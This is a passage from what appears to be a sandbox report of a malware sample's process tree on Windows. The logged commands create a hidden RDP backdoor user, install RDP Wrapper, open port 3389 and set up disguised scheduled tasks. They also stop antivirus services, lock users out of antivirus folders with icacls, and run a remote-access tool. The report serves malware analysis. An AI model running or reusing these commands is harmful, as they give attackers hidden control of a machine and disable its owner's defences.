C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:4412
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵PID:3652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵PID:4972
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵PID:4288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵PID:4480
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵PID:1940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵PID:4384
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵PID:4316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:4744
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵PID:5112
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
PID:5028
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵PID:4200
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵PID:2192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵PID:4220
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5052
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4672
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
PID:1508
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:4880
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
PID:4436
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4960
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5036
-
-
C:\ProgramData\WindowsTask\update.exeC:\ProgramData\WindowsTask\update.exe4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4328
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:3136
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2412
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:476
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵PID:4072
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵PID:2452
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵PID:3112
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵PID:4080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵PID:2972
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵PID:3700
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵PID:2416
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵PID:3644
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵PID:4088
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵PID:1524
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵PID:2492
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵PID:3188
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵PID:3040
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵PID:3820
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:68
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵PID:2184
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵PID:1776
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵PID:1032
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵PID:3932
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵PID:3164
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵PID:3012
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵PID:2428
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵PID:1748
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵PID:1316
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵PID:2640
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵PID:3492
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵PID:1832
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵PID:2232
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵PID:3904
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵PID:2588
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
PID:2984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵PID:2960
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵PID:3280
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵PID:3356
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵PID:4000
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵PID:1448
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵PID:1760
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵PID:2908
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵PID:3248
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵PID:2404
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵PID:2152
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵PID:3916
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵PID:2220
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵PID:4132
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵PID:4216
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵PID:4280
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:4420
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:4512
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:4576
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵PID:4656
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵PID:4776
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵PID:4840
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:4904
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:4968
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵PID:5064
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:4292
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:4604
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:4724
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:4788
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:4920
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵PID:5020
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵PID:5048
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵PID:4112
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵PID:4124
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵PID:4264
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)2⤵PID:3584
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵PID:4368
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵PID:4552
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵PID:4600
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵PID:4800
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵PID:4848
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵PID:4928
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵PID:4104
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4416
-
-
-
C:\Programdata\Install\utorrent.exeC:\Programdata\Install\utorrent.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
PID:2940 -
C:\ProgramData\WindowsTask\azur.exeC:\ProgramData\WindowsTask\azur.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"4⤵PID:4404
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 35⤵
- Delays execution with timeout.exe
PID:5088
-
-
-
-
C:\ProgramData\WindowsTask\system.exeC:\ProgramData\WindowsTask\system.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "4⤵PID:2660
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -u3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4468 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"4⤵PID:5024
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i3⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4836 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow4⤵PID:5108
-
-
-
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3752
-
